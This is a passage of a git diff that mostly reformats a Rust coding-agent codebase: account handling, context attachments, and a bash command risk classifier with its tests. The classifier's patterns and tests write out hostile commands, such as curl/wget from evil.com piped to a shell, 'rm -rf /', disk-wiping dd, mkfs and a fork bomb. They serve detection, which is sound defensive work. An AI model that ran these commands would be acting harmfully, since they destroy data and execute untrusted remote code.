session_stats_from_entries( - session_id, - project_dir, - path.clone(), - mtime, - &entries, - ); + let mut stats = + session_stats_from_entries(session_id, project_dir, path.clone(), mtime, &entries); if stats.last_prompt.is_none() || stats.title.is_none() { let (lp, t) = read_session_tail_metadata_sync(&path); if stats.last_prompt.is_none() { @@ -1359,13 +1337,7 @@ mod tests { "2024-01-15T10:00:05Z", ), make_user("2024-01-15T10:01:00Z"), - make_assistant_with_cost( - 200, - 80, - 0.005, - &["bash"], - "2024-01-15T10:01:10Z", - ), + make_assistant_with_cost(200, 80, 0.005, &["bash"], "2024-01-15T10:01:10Z"), ], ) .await; diff --git a/src-rust/crates/core/src/accounts.rs b/src-rust/crates/core/src/accounts.rs index a46f4b0..ad34115 100644 --- a/src-rust/crates/core/src/accounts.rs +++ b/src-rust/crates/core/src/accounts.rs @@ -219,9 +219,17 @@ pub fn slugify_profile_id(raw: &str) -> String { let lowered = raw.trim().to_lowercase(); let mapped: String = lowered .chars() - .map(|c| if c.is_ascii_alphanumeric() || c == '-' || c == '_' { c } else { '-' }) + .map(|c| { + if c.is_ascii_alphanumeric() || c == '-' || c == '_' { + c + } else { + '-' + } + }) .collect(); - let trimmed = mapped.trim_matches(|c: char| c == '-' || c == '_').to_string(); + let trimmed = mapped + .trim_matches(|c: char| c == '-' || c == '_') + .to_string(); if trimmed.is_empty() { "account".to_string() } else { @@ -230,11 +238,7 @@ pub fn slugify_profile_id(raw: &str) -> String { } /// If the requested id already exists, suffix with -2, -3, … until free. -pub fn ensure_unique_profile_id( - registry: &AccountRegistry, - provider: &str, - base: &str, -) -> String { +pub fn ensure_unique_profile_id(registry: &AccountRegistry, provider: &str, base: &str) -> String { let base = slugify_profile_id(base); if registry.get(provider, &base).is_none() { return base; @@ -251,7 +255,9 @@ pub fn ensure_unique_profile_id( /// `~/.coven-code/`. pub fn claurst_dir() -> PathBuf { - dirs::home_dir().unwrap_or_else(|| PathBuf::from(".")).join(".coven-code") + dirs::home_dir() + .unwrap_or_else(|| PathBuf::from(".")) + .join(".coven-code") } /// `~/.coven-code/accounts///`. @@ -271,7 +277,10 @@ pub fn codex_token_path(profile_id: &str) -> PathBuf { /// Backup directory for the previous live token file (rotated on each switch). pub fn backup_dir(provider: &str) -> PathBuf { - claurst_dir().join("accounts").join(provider).join(".backups") + claurst_dir() + .join("accounts") + .join(provider) + .join(".backups") } fn now_iso() -> String { @@ -390,7 +399,10 @@ mod tests { let mut section = ProviderAccounts::default(); section.profiles.insert( "work".to_string(), - AccountProfile { id: "work".into(), ..Default::default() }, + AccountProfile { + id: "work".into(), + ..Default::default() + }, ); reg.providers.insert(PROVIDER_ANTHROPIC.into(), section); @@ -439,7 +451,10 @@ mod tests { #[test] fn account_profile_display_falls_back_through_label_email_id() { - let mut p = AccountProfile { id: "kuber".into(), ..Default::default() }; + let mut p = AccountProfile { + id: "kuber".into(), + ..Default::default() + }; assert_eq!(p.display_name(), "kuber"); p.email = Some("kuber@example.com".into()); assert_eq!(p.display_name(), "kuber@example.com"); diff --git a/src-rust/crates/core/src/attachments.rs b/src-rust/crates/core/src/attachments.rs index 508b9a6..b329eae 100644 --- a/src-rust/crates/core/src/attachments.rs +++ b/src-rust/crates/core/src/attachments.rs @@ -1,224 +1,230 @@ -//! Attachment pipeline — mirrors src/utils/attachments.ts -//! -//! Assembles all context attachments for a conversation turn: -//! IDE context, tasks, plans, skills, agents, MCP, file changes, memory. - -use serde::{Deserialize, Serialize}; -use std::path::Path; - -/// The kind of attachment. -#[derive(Debug, Clone, Serialize, Deserialize)] -#[serde(rename_all = "snake_case")] -pub enum AttachmentKind { - HookSuccess, - HookError, - HookNonBlockingError, - HookErrorDuringExecution, - HookStoppedContinuation, - SkillListing, - AgentListing, - McpInstructions, - IdeContext, - TaskContext, - PlanContext, - ChangedFiles, - Memory, - Generic, -} - -/// A single context attachment. -#[derive(Debug, Clone, Serialize, Deserialize)] -pub struct Attachment { - pub kind: AttachmentKind, - pub content: String, - /// Optional label for display (e.g., filename, server name). - pub label: Option, -} - -impl Attachment { - pub fn new(kind: AttachmentKind, content: impl Into) -> Self { - Self { kind, content: content.into(), label: None } - } - - pub fn with_label(mut self, label: impl Into) -> Self { - self.label = Some(label.into()); - self - } -} - -/// Context passed to `get_attachments`. -pub struct AttachmentContext<'a> { - pub project_root: &'a Path, - pub working_dir: &'a Path, - pub session_id: &'a str, - pub last_turn_timestamp_ms: Option, -} - -/// Assemble all context attachments for the current turn. -/// -/// Returns a vec of attachments to inject as a pre-turn context message. -pub fn get_attachments(ctx: &AttachmentContext<'_>) -> Vec { - let mut attachments = Vec::new(); - - // 1. IDE context - if let Some(ide) = get_ide_context() { - attachments.push(Attachment::new(AttachmentKind::IdeContext, ide)); - } - - // 2. Changed files (since last turn) - if let Some(ts) = ctx.last_turn_timestamp_ms { - let changed = get_changed_files(ctx.project_root, ts); - if !changed.is_empty() { - let content = format!( - "Files changed since last turn:\n{}", - changed.iter().map(|f| format!(" {}", f)).collect::>().join("\n") - ); - attachments.push(Attachment::new(AttachmentKind::ChangedFiles, content)); - } - } - - attachments -} - -/// Get IDE context from the lockfile (if an IDE is connected). -/// -/// Returns a formatted string like: -/// `IDE: VS Code, workspace: /path/to/project, selection: L10-L20 in foo.rs` -pub fn get_ide_context() -> Option { - let lockfile_dir = dirs::home_dir()?.join(".coven-code").join("ide"); - let entries = std::fs::read_dir(&lockfile_dir).ok()?; - - for entry in entries.flatten() { - let path = entry.path(); - if path.extension().map_or(false, |e| e == "lock") { - if let Ok(content) = std::fs::read_to_string(&path) { - if let Ok(info) = serde_json::from_str::(&content) { - let pid = info["pid"].as_u64().unwrap_or(0); - if !is_pid_alive(pid) { - continue; - } - let ide_name = info["ideName"].as_str().unwrap_or("IDE"); - let workspace = info["workspaceFolders"] - .as_array() - .and_then(|a| a.first()) - .and_then(|v| v.as_str()) - .unwrap_or(""); - let mut parts = vec![format!("IDE: {}", ide_name)]; - if !workspace.is_empty() { - parts.push(format!("workspace: {}", workspace)); - } - // Active file/selection if present - if let Some(file) = info["activeFile"].as_str() { - parts.push(format!("active file: {}", file)); - if let (Some(start), Some(end)) = ( - info["selectionStart"].as_u64(), - info["selectionEnd"].as_u64(), - ) { - if start != end { - parts.push(format!("selection: L{}-L{}", start, end)); - } - } - } - return Some(parts.join(", ")); - } - } - } - } - None -} - -/// Check if a PID corresponds to a running process. -fn is_pid_alive(pid: u64) -> bool { - if pid == 0 { - return false; - } - #[cfg(target_os = "windows")] - { - std::process::Command::new("tasklist") - .args(["/FI", &format!("PID eq {}", pid), "/NH"]) - .output() - .map(|o| String::from_utf8_lossy(&o.stdout).contains(&pid.to_string())) - .unwrap_or(false) - } - #[cfg(not(target_os = "windows"))] - { - std::path::Path::new(&format!("/proc/{}", pid)).exists() - } -} - -/// Get files changed since `since_ms` (Unix timestamp in ms) using git. -pub fn get_changed_files(project_root: &Path, since_ms: u64) -> Vec { - // Try git diff --name-only --diff-filter=M - let output = std::process::Command::new("git") - .args(["diff", "--name-only", "--diff-filter=AMDR", "HEAD"]) - .current_dir(project_root) - .output(); - - match output { - Ok(out) if out.status.success() => { - String::from_utf8_lossy(&out.stdout) - .lines() - .filter(|l| !l.is_empty()) - .map(|l| l.to_string()) - .collect() - } - _ => { - // Fallback: scan for files modified since timestamp using mtime - let since_secs = since_ms / 1000; - let mut files = Vec::new(); - scan_modified_files(project_root, since_secs, &mut files, 0); - files - } - } -} - -fn scan_modified_files(dir: &Path, since_secs: u64, out: &mut Vec, depth: usize) { - if depth > 3 { - return; - } - let Ok(entries) = std::fs::read_dir(dir) else { - return; - }; - for entry in entries.flatten() { - let path = entry.path(); - let name = entry.file_name(); - let name_str = name.to_string_lossy(); - // Skip hidden dirs and node_modules / target - if name_str.starts_with('.') || name_str == "node_modules" || name_str == "target" { - continue; - } - if path.is_dir() { - scan_modified_files(&path, since_secs, out, depth + 1); - } else if let Ok(meta) = entry.metadata() { - if let Ok(modified) = meta.modified() { - let mtime = modified - .duration_since(std::time::UNIX_EPOCH) - .unwrap_or_default() - .as_secs(); - if mtime >= since_secs { - out.push(path.to_string_lossy().to_string()); - } - } - } - } -} - -/// Build a hook result attachment message. -pub fn make_hook_result_attachment(hook_name: &str, output: &str, success: bool) -> Attachment { - let kind = if success { - AttachmentKind::HookSuccess - } else { - AttachmentKind::HookError - }; - Attachment::new(kind, format!("[Hook: {}]\n{}", hook_name, output)) - .with_label(hook_name.to_string()) -} - -/// Compute the diff of available tools between two turns. -pub fn get_deferred_tools_delta(prev_tools: &[String], curr_tools: &[String]) -> Vec { - curr_tools - .iter() - .filter(|t| !prev_tools.contains(t)) - .cloned() - .collect() -} +//! Attachment pipeline — mirrors src/utils/attachments.ts +//! +//! Assembles all context attachments for a conversation turn: +//! IDE context, tasks, plans, skills, agents, MCP, file changes, memory. + +use serde::{Deserialize, Serialize}; +use std::path::Path; + +/// The kind of attachment. +#[derive(Debug, Clone, Serialize, Deserialize)] +#[serde(rename_all = "snake_case")] +pub enum AttachmentKind { + HookSuccess, + HookError, + HookNonBlockingError, + HookErrorDuringExecution, + HookStoppedContinuation, + SkillListing, + AgentListing, + McpInstructions, + IdeContext, + TaskContext, + PlanContext, + ChangedFiles, + Memory, + Generic, +} + +/// A single context attachment. +#[derive(Debug, Clone, Serialize, Deserialize)] +pub struct Attachment { + pub kind: AttachmentKind, + pub content: String, + /// Optional label for display (e.g., filename, server name). + pub label: Option, +} + +impl Attachment { + pub fn new(kind: AttachmentKind, content: impl Into) -> Self { + Self { + kind, + content: content.into(), + label: None, + } + } + + pub fn with_label(mut self, label: impl Into) -> Self { + self.label = Some(label.into()); + self + } +} + +/// Context passed to `get_attachments`. +pub struct AttachmentContext<'a> { + pub project_root: &'a Path, + pub working_dir: &'a Path, + pub session_id: &'a str, + pub last_turn_timestamp_ms: Option, +} + +/// Assemble all context attachments for the current turn. +/// +/// Returns a vec of attachments to inject as a pre-turn context message. +pub fn get_attachments(ctx: &AttachmentContext<'_>) -> Vec { + let mut attachments = Vec::new(); + + // 1. IDE context + if let Some(ide) = get_ide_context() { + attachments.push(Attachment::new(AttachmentKind::IdeContext, ide)); + } + + // 2. Changed files (since last turn) + if let Some(ts) = ctx.last_turn_timestamp_ms { + let changed = get_changed_files(ctx.project_root, ts); + if !changed.is_empty() { + let content = format!( + "Files changed since last turn:\n{}", + changed + .iter() + .map(|f| format!(" {}", f)) + .collect::>() + .join("\n") + ); + attachments.push(Attachment::new(AttachmentKind::ChangedFiles, content)); + } + } + + attachments +} + +/// Get IDE context from the lockfile (if an IDE is connected). +/// +/// Returns a formatted string like: +/// `IDE: VS Code, workspace: /path/to/project, selection: L10-L20 in foo.rs` +pub fn get_ide_context() -> Option { + let lockfile_dir = dirs::home_dir()?.join(".coven-code").join("ide"); + let entries = std::fs::read_dir(&lockfile_dir).ok()?; + + for entry in entries.flatten() { + let path = entry.path(); + if path.extension().is_some_and(|e| e == "lock") { + if let Ok(content) = std::fs::read_to_string(&path) { + if let Ok(info) = serde_json::from_str::(&content) { + let pid = info["pid"].as_u64().unwrap_or(0); + if !is_pid_alive(pid) { + continue; + } + let ide_name = info["ideName"].as_str().unwrap_or("IDE"); + let workspace = info["workspaceFolders"] + .as_array() + .and_then(|a| a.first()) + .and_then(|v| v.as_str()) + .unwrap_or(""); + let mut parts = vec![format!("IDE: {}", ide_name)]; + if !workspace.is_empty() { + parts.push(format!("workspace: {}", workspace)); + } + // Active file/selection if present + if let Some(file) = info["activeFile"].as_str() { + parts.push(format!("active file: {}", file)); + if let (Some(start), Some(end)) = ( + info["selectionStart"].as_u64(), + info["selectionEnd"].as_u64(), + ) { + if start != end { + parts.push(format!("selection: L{}-L{}", start, end)); + } + } + } + return Some(parts.join(", ")); + } + } + } + } + None +} + +/// Check if a PID corresponds to a running process. +fn is_pid_alive(pid: u64) -> bool { + if pid == 0 { + return false; + } + #[cfg(target_os = "windows")] + { + std::process::Command::new("tasklist") + .args(["/FI", &format!("PID eq {}", pid), "/NH"]) + .output() + .map(|o| String::from_utf8_lossy(&o.stdout).contains(&pid.to_string())) + .unwrap_or(false) + } + #[cfg(not(target_os = "windows"))] + { + std::path::Path::new(&format!("/proc/{}", pid)).exists() + } +} + +/// Get files changed since `since_ms` (Unix timestamp in ms) using git. +pub fn get_changed_files(project_root: &Path, since_ms: u64) -> Vec { + // Try git diff --name-only --diff-filter=M + let output = std::process::Command::new("git") + .args(["diff", "--name-only", "--diff-filter=AMDR", "HEAD"]) + .current_dir(project_root) + .output(); + + match output { + Ok(out) if out.status.success() => String::from_utf8_lossy(&out.stdout) + .lines() + .filter(|l| !l.is_empty()) + .map(|l| l.to_string()) + .collect(), + _ => { + // Fallback: scan for files modified since timestamp using mtime + let since_secs = since_ms / 1000; + let mut files = Vec::new(); + scan_modified_files(project_root, since_secs, &mut files, 0); + files + } + } +} + +fn scan_modified_files(dir: &Path, since_secs: u64, out: &mut Vec, depth: usize) { + if depth > 3 { + return; + } + let Ok(entries) = std::fs::read_dir(dir) else { + return; + }; + for entry in entries.flatten() { + let path = entry.path(); + let name = entry.file_name(); + let name_str = name.to_string_lossy(); + // Skip hidden dirs and node_modules / target + if name_str.starts_with('.') || name_str == "node_modules" || name_str == "target" { + continue; + } + if path.is_dir() { + scan_modified_files(&path, since_secs, out, depth + 1); + } else if let Ok(meta) = entry.metadata() { + if let Ok(modified) = meta.modified() { + let mtime = modified + .duration_since(std::time::UNIX_EPOCH) + .unwrap_or_default() + .as_secs(); + if mtime >= since_secs { + out.push(path.to_string_lossy().to_string()); + } + } + } + } +} + +/// Build a hook result attachment message. +pub fn make_hook_result_attachment(hook_name: &str, output: &str, success: bool) -> Attachment { + let kind = if success { + AttachmentKind::HookSuccess + } else { + AttachmentKind::HookError + }; + Attachment::new(kind, format!("[Hook: {}]\n{}", hook_name, output)) + .with_label(hook_name.to_string()) +} + +/// Compute the diff of available tools between two turns. +pub fn get_deferred_tools_delta(prev_tools: &[String], curr_tools: &[String]) -> Vec { + curr_tools + .iter() + .filter(|t| !prev_tools.contains(t)) + .cloned() + .collect() +} diff --git a/src-rust/crates/core/src/auth_store.rs b/src-rust/crates/core/src/auth_store.rs index 26d9308..593b4ed 100644 --- a/src-rust/crates/core/src/auth_store.rs +++ b/src-rust/crates/core/src/auth_store.rs @@ -83,11 +83,10 @@ impl AuthStore { // Check stored credentials first if let Some(stored) = self.get(provider_id) { match stored { - StoredCredential::ApiKey { key } => { - if !key.is_empty() { - return Some(key.clone()); - } + StoredCredential::ApiKey { key } if !key.is_empty() => { + return Some(key.clone()); } + StoredCredential::ApiKey { .. } => {} StoredCredential::OAuthToken { access, refresh, .. } if provider_id == "github-copilot" => { diff --git a/src-rust/crates/core/src/bash_classifier.rs b/src-rust/crates/core/src/bash_classifier.rs index fbd312e..6ece398 100644 --- a/src-rust/crates/core/src/bash_classifier.rs +++ b/src-rust/crates/core/src/bash_classifier.rs @@ -1,485 +1,681 @@ -// Bash security classifier for Coven Code. -// -// Classifies shell commands by risk level and determines whether they can be -// auto-approved given the current permission mode. Used by BashTool's -// `permission_level()` override and the auto-approval logic. - -use crate::config::PermissionMode; - -// --------------------------------------------------------------------------- -// Risk levels -// --------------------------------------------------------------------------- - -/// Ordered risk level assigned to a bash command. -/// -/// The ordering is intentional: `Safe < Low < Medium < High < Critical`. -/// Code that compares levels should use `>=` / `<=` rather than `==`. -#[derive(Debug, Clone, Copy, PartialEq, Eq, PartialOrd, Ord)] -pub enum BashRiskLevel { - /// Read-only operations that cannot modify system state. - /// Examples: ls, cat, grep, find, echo, git status, git log. - Safe, - /// Low-risk write operations or common dev tools without escalation. - /// Examples: git commit, npm install, cargo build, pip install. - Low, - /// Moderate-risk operations: file deletion, process signals, config edits. - /// Examples: rm -r, kill, pkill, systemctl, ufw, iptables. - Medium, - /// High-risk: privilege escalation, network-to-disk writes, pipe-to-shell. - /// Examples: sudo, su, curl … | bash, wget … | sh, nc -l > file. - High, - /// Critical: irreversible system-destructive operations. - /// Examples: rm -rf /, dd if=…, mkfs, fork bomb, chmod 777 /, shred. - Critical, -} - -// --------------------------------------------------------------------------- -// Internal helpers -// --------------------------------------------------------------------------- - -/// Strip leading shell boilerplate (`sudo`, `env`, etc.) and return the first -/// real command token together with the rest of the argument string. -fn split_command(raw: &str) -> (&str, &str) { - let s = raw.trim(); - // Skip common wrappers so we can inspect the actual command. - let skip = ["sudo ", "su -c ", "env ", "nice ", "nohup ", "time "]; - for prefix in &skip { - if let Some(rest) = s.strip_prefix(prefix) { - return split_command(rest); - } - } - // Split on first whitespace. - match s.find(|c: char| c.is_ascii_whitespace()) { - Some(pos) => (&s[..pos], s[pos..].trim()), - None => (s, ""), - } -} - -/// Check whether `haystack` contains `needle` as a whole word (bounded by -/// non-alphanumeric/underscore characters or start/end of string). -fn has_flag(args: &str, flag: &str) -> bool { - // Simple substring check is enough for flag detection; flags always - // start with `-` which is already non-word, so substring is fine. - args.contains(flag) -} - -/// Return true if the command string looks like `cmd … | bash/sh/zsh/fish`. -fn is_pipe_to_shell(cmd: &str) -> bool { - // We look for a pipe character followed (possibly with whitespace) by a - // shell executable. Using a simple text scan avoids a regex dependency. - let shells = ["bash", "sh", "zsh", "fish", "dash", "ksh", "tcsh", "csh"]; - if let Some(pipe_pos) = cmd.find('|') { - let after_pipe = cmd[pipe_pos + 1..].trim(); - for shell in &shells { - // Could be `bash`, `bash -s`, `/bin/bash`, etc. - if after_pipe == *shell - || after_pipe.starts_with(&format!("{} ", shell)) - || after_pipe.starts_with(&format!("{}\t", shell)) - || after_pipe.ends_with(&format!("/{}", shell)) - || after_pipe.contains(&format!("/{} ", shell)) - { - return true; - } - } - } - false -} - -/// Detect the classic fork-bomb pattern `:(){ :|:& };:`. -fn is_fork_bomb(cmd: &str) -> bool { - // Strip all whitespace for a normalised comparison. - let normalised: String = cmd.chars().filter(|c| !c.is_ascii_whitespace()).collect(); - // Canonical form and common variations. - normalised.contains(":(){ :|:&};:") - || normalised.contains(":(){ :|:&};") - || normalised.contains(":(){:|:&};:") - || normalised.contains(":(){:|:&}") -} - -// --------------------------------------------------------------------------- -// Public API -// --------------------------------------------------------------------------- - -/// Classify a bash command string and return its risk level. -/// -/// The analysis is intentionally conservative: when in doubt, the higher risk -/// level is returned. The function does *not* execute any subprocess. -pub fn classify_bash_command(command: &str) -> BashRiskLevel { - let cmd = command.trim(); - - // ── Critical patterns ────────────────────────────────────────────────── - - // Fork bomb - if is_fork_bomb(cmd) { - return BashRiskLevel::Critical; - } - - // Pipe-to-shell with download (curl/wget piped directly to a shell) - if is_pipe_to_shell(cmd) { - // Any pipe-to-shell is at least High; if it fetches from the network it's Critical. - let fetch_cmds = ["curl", "wget", "fetch", "lwp-request"]; - let lower = cmd.to_lowercase(); - for fc in &fetch_cmds { - if lower.contains(fc) { - return BashRiskLevel::Critical; - } - } - return BashRiskLevel::High; - } - - // dd with an if= (disk image writing) — extremely destructive - if cmd.starts_with("dd ") || cmd == "dd" { - if cmd.contains("if=") { - return BashRiskLevel::Critical; - } - } - - // mkfs — format filesystem - if cmd.starts_with("mkfs") || cmd.starts_with("mkfs.") { - return BashRiskLevel::Critical; - } - - // shred — secure erase - if cmd.starts_with("shred ") || cmd == "shred" { - return BashRiskLevel::Critical; - } - - // Detect `rm` with `-rf` (or `-fr`) targeting root or very short paths - if cmd.starts_with("rm ") { - let args = &cmd[3..]; - let has_r = has_flag(args, "-r") - || has_flag(args, "-R") - || has_flag(args, "-rf") - || has_flag(args, "-fr") - || has_flag(args, "-Rf") - || has_flag(args, "-fR"); - let has_f = has_flag(args, "-f") - || has_flag(args, "-rf") - || has_flag(args, "-fr") - || has_flag(args, "-Rf") - || has_flag(args, "-fR"); - - if has_r && has_f { - // Check for targeting root / critical system paths - let critical_targets = [" /", "/ ", "/*", " ~", "~/", " $HOME", "$(", " `"]; - for t in &critical_targets { - if args.contains(t) { - return BashRiskLevel::Critical; - } - } - } - } - - // chmod 777 on / or critical paths - if cmd.starts_with("chmod ") { - let args = &cmd[6..]; - if (args.contains("777") || args.contains("a+rwx")) - && (args.contains(" /") || args.ends_with('/')) - { - return BashRiskLevel::Critical; - } - } - - // ── Privilege escalation → High ──────────────────────────────────────── - - if cmd.starts_with("sudo ") || cmd == "sudo" { - return BashRiskLevel::High; - } - if cmd.starts_with("su ") || cmd == "su" { - return BashRiskLevel::High; - } - - // Network writes to disk (general curl/wget with -o / redirect) - { - let lower = cmd.to_lowercase(); - let is_network_fetch = lower.starts_with("curl ") - || lower.starts_with("wget ") - || lower.starts_with("fetch "); - if is_network_fetch { - let writes_to_disk = lower.contains(" -o ") - || lower.contains(" -o\t") - || lower.ends_with(" -o") - || lower.contains(" --output ") - || lower.contains(" -O ") // wget uppercase-O saves to file - || lower.ends_with(" -O") - || cmd.contains(" > "); - if writes_to_disk { - return BashRiskLevel::High; - } - // Plain fetch (stdout only) — still High because it exfiltrates or pulls code. - return BashRiskLevel::High; - } - } - - // netcat / ncat listening - if cmd.starts_with("nc ") || cmd.starts_with("ncat ") || cmd.starts_with("netcat ") { - return BashRiskLevel::High; - } - - // Sensitive credential operations - if cmd.starts_with("gpg ") || cmd.starts_with("ssh-keygen ") { - return BashRiskLevel::High; - } - - // ── Medium-risk ──────────────────────────────────────────────────────── - - // rm (without -rf on critical paths, but still destructive) - if cmd.starts_with("rm ") || cmd == "rm" { - return BashRiskLevel::Medium; - } - - // Process signals - if cmd.starts_with("kill ") || cmd == "kill" || cmd.starts_with("pkill ") || cmd.starts_with("killall ") { - return BashRiskLevel::Medium; - } - - // System configuration - let medium_cmds = [ - "systemctl ", "service ", "ufw ", "iptables ", "ip6tables ", - "firewall-cmd ", "chown ", "chmod ", "chgrp ", - "crontab ", "at ", "useradd ", "userdel ", "usermod ", - "groupadd ", "groupdel ", "passwd ", - "mount ", "umount ", "fdisk ", "parted ", - "apt ", "apt-get ", "yum ", "dnf ", "pacman ", "brew ", - "snap ", "flatpak ", "dpkg ", "rpm ", - "mktemp ", "truncate ", - ]; - for mc in &medium_cmds { - if cmd.starts_with(mc) { - return BashRiskLevel::Medium; - } - } - - // mv that targets sensitive paths - if cmd.starts_with("mv ") { - let args = &cmd[3..]; - let sensitive = [" /etc/", " /bin/", " /usr/", " /lib/", " /boot/"]; - for s in &sensitive { - if args.contains(s) { - return BashRiskLevel::Medium; - } - } - } - - // Redirect-overwrite to a file (could clobber important files) - if cmd.contains(" > ") && !cmd.contains(">>") { - // Only flag if the write goes to a system path - let after_redir = cmd.split(" > ").last().unwrap_or("").trim(); - if after_redir.starts_with("/etc/") - || after_redir.starts_with("/bin/") - || after_redir.starts_with("/usr/") - || after_redir.starts_with("/lib/") - || after_redir.starts_with("/boot/") - { - return BashRiskLevel::Medium; - } - } - - // ── Low-risk: common dev tools ───────────────────────────────────────── - - let (bin, args) = split_command(cmd); - let low_cmds = [ - "git", "npm", "npx", "yarn", "pnpm", - "cargo", "rustup", "rustc", - "pip", "pip3", "python", "python3", - "node", "deno", "bun", - "go", "mvn", "gradle", "gradle", - "make", "cmake", "meson", "ninja", - "docker", "docker-compose", "podman", - "kubectl", "helm", "terraform", "ansible", - "ssh", "scp", "rsync", - "tar", "zip", "unzip", "gzip", "gunzip", "7z", - "touch", "mkdir", "cp", "ln", - "tee", "wc", "sort", "uniq", "head", "tail", - "sed", "awk", "cut", "tr", - "xargs", "parallel", - "jq", "yq", "tomlq", - "less", "more", "man", - "env", "export", "source", ".", - "printf", "date", "uname", "hostname", - "which", "whereis", "type", - "du", "df", "free", "uptime", "top", "htop", "ps", - "lsof", "strace", "ltrace", - "diff", "patch", - "openssl", - "base64", "xxd", "od", - "sleep", "wait", - "true", "false", "exit", - "test", "[", "[[", - "read", - "bc", "expr", - "tput", "clear", "reset", - ]; - - for lc in &low_cmds { - if bin == *lc { - // git read-only operations are Safe, but write operations (commit, - // push, rm, reset --hard, etc.) are Low. - if bin == "git" { - let git_safe = [ - "status", "log", "diff", "show", "branch", "remote", - "fetch", "ls-files", "ls-tree", "cat-file", "rev-parse", - "describe", "shortlog", "tag", "stash list", "config --list", - "config --get", - ]; - for gs in &git_safe { - if args.starts_with(gs) { - return BashRiskLevel::Safe; - } - } - } - return BashRiskLevel::Low; - } - } - - // ── Safe: read-only ops ───────────────────────────────────────────────── - - let safe_cmds = [ - "ls", "ll", "la", "dir", - "cat", "bat", "less", "more", - "grep", "rg", "ag", "ack", - "find", "locate", "fd", - "echo", "printf", - "pwd", "whoami", "id", "groups", - "uname", "hostname", "uptime", - "date", "cal", - "file", "stat", - "which", "whereis", "type", "command", - "env", "printenv", - "ps", "pgrep", - "df", "du", "free", - "lsblk", "lscpu", "lspci", "lsusb", - "ifconfig", "ip", "ss", "netstat", - "ping", "traceroute", "nslookup", "dig", "host", - "wc", "head", "tail", - "md5sum", "sha1sum", "sha256sum", - "strings", "objdump", "nm", "readelf", - "tree", - ]; - for sc in &safe_cmds { - if bin == *sc { - return BashRiskLevel::Safe; - } - } - - // Default: anything not explicitly classified is Low (conservative but not alarmist) - BashRiskLevel::Low -} - -/// Determine whether a bash command can be auto-approved given `permission_mode`. -/// -/// - `BypassPermissions` → always approve. -/// - `AcceptEdits` → approve `Safe` and `Low` only. -/// - `Default` / `Plan` → never auto-approve bash commands. -pub fn is_auto_approvable(command: &str, permission_mode: &PermissionMode) -> bool { - match permission_mode { - PermissionMode::BypassPermissions => true, - PermissionMode::AcceptEdits => { - let level = classify_bash_command(command); - level <= BashRiskLevel::Low - } - PermissionMode::Default | PermissionMode::Plan => false, - } -} - -// --------------------------------------------------------------------------- -// Tests -// --------------------------------------------------------------------------- - -#[cfg(test)] -mod tests { - use super::*; - - #[test] - fn test_safe_commands() { - assert_eq!(classify_bash_command("ls -la"), BashRiskLevel::Safe); - assert_eq!(classify_bash_command("cat /etc/hosts"), BashRiskLevel::Safe); - assert_eq!(classify_bash_command("grep foo bar.txt"), BashRiskLevel::Safe); - assert_eq!(classify_bash_command("echo hello"), BashRiskLevel::Safe); - assert_eq!(classify_bash_command("find . -name '*.rs'"), BashRiskLevel::Safe); - assert_eq!(classify_bash_command("git status"), BashRiskLevel::Safe); - assert_eq!(classify_bash_command("git log --oneline"), BashRiskLevel::Safe); - } - - #[test] - fn test_low_commands() { - assert_eq!(classify_bash_command("git commit -m 'fix'"), BashRiskLevel::Low); - assert_eq!(classify_bash_command("cargo build"), BashRiskLevel::Low); - assert_eq!(classify_bash_command("npm install"), BashRiskLevel::Low); - assert_eq!(classify_bash_command("pip install requests"), BashRiskLevel::Low); - } - - #[test] - fn test_medium_commands() { - assert_eq!(classify_bash_command("rm -r ./build"), BashRiskLevel::Medium); - assert_eq!(classify_bash_command("kill -9 1234"), BashRiskLevel::Medium); - assert_eq!(classify_bash_command("chmod 644 file.txt"), BashRiskLevel::Medium); - assert_eq!(classify_bash_command("apt-get install vim"), BashRiskLevel::Medium); - } - - #[test] - fn test_high_commands() { - assert_eq!(classify_bash_command("sudo apt-get upgrade"), BashRiskLevel::High); - assert_eq!(classify_bash_command("curl https://example.com/script.sh"), BashRiskLevel::High); - assert_eq!(classify_bash_command("su -c 'whoami'"), BashRiskLevel::High); - } - - #[test] - fn test_critical_commands() { - assert_eq!(classify_bash_command("rm -rf /"), BashRiskLevel::Critical); - assert_eq!( - classify_bash_command("dd if=/dev/zero of=/dev/sda"), - BashRiskLevel::Critical - ); - assert_eq!(classify_bash_command("mkfs.ext4 /dev/sda1"), BashRiskLevel::Critical); - assert_eq!( - classify_bash_command("chmod 777 /"), - BashRiskLevel::Critical - ); - assert_eq!( - classify_bash_command("curl https://evil.com/script | bash"), - BashRiskLevel::Critical - ); - assert_eq!( - classify_bash_command("wget https://evil.com/script | sh"), - BashRiskLevel::Critical - ); - assert_eq!( - classify_bash_command(":(){ :|:& };:"), - BashRiskLevel::Critical - ); - } - - #[test] - fn test_pipe_to_shell_non_fetch() { - // A pipe to shell without a network fetch is still High (not Critical) - assert_eq!( - classify_bash_command("cat script.sh | bash"), - BashRiskLevel::High - ); - } - - #[test] - fn test_auto_approvable_bypass() { - assert!(is_auto_approvable("rm -rf /", &PermissionMode::BypassPermissions)); - } - - #[test] - fn test_auto_approvable_accept_edits() { - assert!(is_auto_approvable("ls -la", &PermissionMode::AcceptEdits)); - assert!(is_auto_approvable("cargo build", &PermissionMode::AcceptEdits)); - assert!(!is_auto_approvable("rm -r ./build", &PermissionMode::AcceptEdits)); - assert!(!is_auto_approvable("sudo make install", &PermissionMode::AcceptEdits)); - } - - #[test] - fn test_auto_approvable_default_denies_all() { - assert!(!is_auto_approvable("ls", &PermissionMode::Default)); - assert!(!is_auto_approvable("echo hi", &PermissionMode::Default)); - } - - #[test] - fn test_auto_approvable_plan_denies_all() { - assert!(!is_auto_approvable("git status", &PermissionMode::Plan)); - } -} +// Bash security classifier for Coven Code. +// +// Classifies shell commands by risk level and determines whether they can be +// auto-approved given the current permission mode. Used by BashTool's +// `permission_level()` override and the auto-approval logic. + +use crate::config::PermissionMode; + +// --------------------------------------------------------------------------- +// Risk levels +// --------------------------------------------------------------------------- + +/// Ordered risk level assigned to a bash command. +/// +/// The ordering is intentional: `Safe < Low < Medium < High < Critical`. +/// Code that compares levels should use `>=` / `<=` rather than `==`. +#[derive(Debug, Clone, Copy, PartialEq, Eq, PartialOrd, Ord)] +pub enum BashRiskLevel { + /// Read-only operations that cannot modify system state. + /// Examples: ls, cat, grep, find, echo, git status, git log. + Safe, + /// Low-risk write operations or common dev tools without escalation. + /// Examples: git commit, npm install, cargo build, pip install. + Low, + /// Moderate-risk operations: file deletion, process signals, config edits. + /// Examples: rm -r, kill, pkill, systemctl, ufw, iptables. + Medium, + /// High-risk: privilege escalation, 